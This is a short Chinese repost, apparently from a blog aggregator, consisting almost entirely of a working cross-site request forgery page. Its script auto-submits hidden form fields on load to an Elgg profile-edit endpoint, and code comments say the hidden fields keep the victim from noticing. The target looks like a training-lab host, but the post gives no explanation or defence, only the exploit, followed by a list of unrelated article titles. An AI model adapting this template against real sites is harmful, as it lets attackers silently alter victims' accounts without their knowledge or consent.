CSRF模拟post请求
来源:互联网 发布:迫击炮升级数据 编辑:程序博客网 时间:2024/06/04 23:35
隐藏发送post请求:
<html><body><h1>This page forges an HTTP POST request.</h1><script type="text/javascript">function post(url,fields){//create a <form> element.var p = document.createElement("form");//construct the formp.action = url;p.innerHTML = fields;p.target = "_self";p.method = "post";//append the form to the current page.document.body.appendChild(p);//submit the formp.submit();}function csrf_hack(){var fields;// The following are form entries that need to be filled out// by attackers. The entries are made hidden, so the victim// won't be able to see them.fields += "<input type='hidden' name='name' value='Alice'>";fields += "<input type='hidden' name='description' value='aaaaaaaaaa'>";fields += "<input type='hidden' name='accesslevel[description]'value='2'>";fields += "<input type='hidden' name='briefdescription' value=''>";fields += "<input type='hidden' name='accesslevel[briefdescription]' value='2'>";fields += "<input type='hidden' name='location' value=''>";fields += "<input type='hidden' name='accesslevel[location]' value='2'>";fields += "<input type='hidden' name='guid' value='39'>";var url = "http://www.csrflabelgg.com/action/profile/edit";post(url,fields);}// invoke csrf_hack() after the page is loaded.window.onload = function() { csrf_hack();}</script></body></html>
0 0
- CSRF模拟post请求
- django 处理POST请求时报403 -- csrf
- 模拟Post请求
- HTTP 模拟post请求
- C#模拟post请求
- Java模拟post请求
- asp模拟post请求
- cURL模拟POST请求
- 模拟post请求
- 终端模拟post请求
- 模拟POST请求
- CURL模拟post请求
- JAVA模拟POST请求
- 模拟POST请求
- Java模拟Post请求
- JAVA模拟post请求
- curl模拟post请求
- HttpClient模拟Post请求
- sed基础知识
- MongoDB安装为Windows服务方法与注意事项
- OJ矩阵之和
- 我的.Net技术体系
- SDWebImage 使用
- CSRF模拟post请求
- 黑马程序员-------Java概述
- 【Unity3d】在编辑器中实现位操作(Bit)的编辑
- linux 下的 vim 命令
- 利用tomcat发布WEB项目到内网和外网的方法
- 向Fragment传递数据
- 第十六周 项目一-平方根中的异常
- ios 启动程序时隐藏状态栏,启动后显示状态栏
- ruby-数字、字符串、数组